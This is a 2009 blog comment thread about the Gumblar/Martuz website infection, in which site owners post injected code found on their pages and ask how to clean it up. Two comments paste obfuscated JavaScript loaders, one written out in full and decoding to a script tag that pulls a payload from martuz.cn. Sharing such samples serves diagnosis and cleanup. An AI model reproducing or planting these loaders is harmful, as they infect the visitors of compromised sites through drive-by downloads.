Comments on: Martuz .cn – New Incarnation of the Gumblar Exploit. So What’s New?

By: LiderPaylasim

LiderPaylasim — Fri, 04 Sep 2009 10:10:07 +0000

Macromedia Dreamweaver I meant….

By: Greg

Greg — Thu, 03 Sep 2009 06:28:03 +0000

I pulled this off my site. Does anyone know what it is?
Every index page or folder on my client’s site with an index file had a variant of that code on it.

I would like to find a way of scanning every file on my server for that code if anyone knows a way, please share.

This is the bugger code!

c10z4=”;y607d50a7=/* ybe2941746 */document;y607d50a7.write(‘function ya7e355862b(ybb011505854){return ev’+c10z4+’al(ybb011505854); }’); function c101e3f8acy4aaf1(yb4f4fa702){ var zb3=”;return (ya7e355862b(‘par’+zb3+’seInt’)(yb4f4fa702,16));}function yddd1a98894e(y46cc6e076){ function y793dae(){var y43d1297eada=2;return y43d1297eada;} var y40fa2c6=”;yab485=’fromCh’;ya7ca8b5ecee=String[yab485+'arCode'];for(yda0de91=0;yda0de91

By: Alec Waters

Alec Waters — Thu, 02 Jul 2009 15:52:32 +0000

Hi Mauren,

They want to infect visitors to your site. It’s called a “drive-by” download.

alec

By: sam

sam — Thu, 02 Jul 2009 09:06:41 +0000

my website boilpass .com has been attacked too. so boring things !

By: Mauren

Mauren — Mon, 22 Jun 2009 08:08:46 +0000

The remaining question, why do they exploit?

What’s they’re reason to inject iframes and backdoors?

Does any1 know what they’re after?

By: ‘Gumblar’ attacks spreading quickly « blog.hugepixels

‘Gumblar’ attacks spreading quickly « blog.hugepixels — Sat, 20 Jun 2009 11:30:47 +0000

[...] payload has, however, continued to be delivered from a different source, the martuz.cn domain, Unmask Parasites said Monday in an [...]

By: Frederik

Frederik — Tue, 16 Jun 2009 07:27:18 +0000

I have the following variant in my source code:

(function(VXz3Z){var BbU=’%';var FxUO=’v!61r!20a!3d!22Sc!72ip!74Eng!69ne!22!2c!62!3d!22V!65rsion()!2b!22!2cj!3d!22!22!2cu!3dn!61!76igat!6fr!2euserAgent!3bif(!28!75!2eindexOf(!22Chrom!65!22)!3c0)!26!26(u!2e!69nd!65xOf(!22!57in!22!29!3e0)!26!26(u!2ein!64exO!66!28!22N!54!206!22)!3c!30!29!26!26(d!6f!63!75ment!2eco!6fkie!2eindexOf(!22mi!65k!3d1!22)!3c0)!26!26(typeo!66(!7ar!76zts)!21!3dt!79!70e!6ff(!22A!22)))!7bzrvzts!3d!22A!22!3b!65va!6c(!22i!66(wi!6e!64!6fw!2e!22+a!2b!22)j!3d!6a+!22+a+!22Major!22+b+a+!22Minor!22+!62+!61!2b!22!42u!69l!64!22+b+!22j!3b!22!29!3bdocume!6et!2ewrite(!22!3csc!72i!70t!20!73r!63!3d!2f!2fmar!74u!22+!22z!2e!63n!2fv!69d!2f!3f!69d!3d!22!2bj!2b!22!3e!3c!5c!2fsc!72ipt!3e!22)!3b!7d’;eval(unescape(FxUO.replace(VXz3Z,BbU)))})(/\!/g);

By: Chris

Chris — Fri, 12 Jun 2009 18:25:46 +0000

We have developed a small application that deals with this kind of viruses.

Please check it out here:
http://www.axxis.gr/index.php?option=com_content&view=article&id=35

By: ‘Gumblar’ attacks spreading quickly | Mujiono

‘Gumblar’ attacks spreading quickly | Mujiono — Mon, 08 Jun 2009 23:46:33 +0000

[...] payload has, however, continued to be delivered from a different source, the martuz.cn domain, Unmask Parasites said Monday in an [...]

By: hemuman

hemuman — Wed, 03 Jun 2009 12:53:24 +0000

My website is infected tooo…. and its makin my life tough…. hope i will find cure soon….

Edit by Denis: Site link had been removed from you signature since the site was still blacklisted by Google.
http://www.UnmaskParasites.com/security-report/?page=manojky.net
Consider requesting a malware review via Google’s Webmaster Tools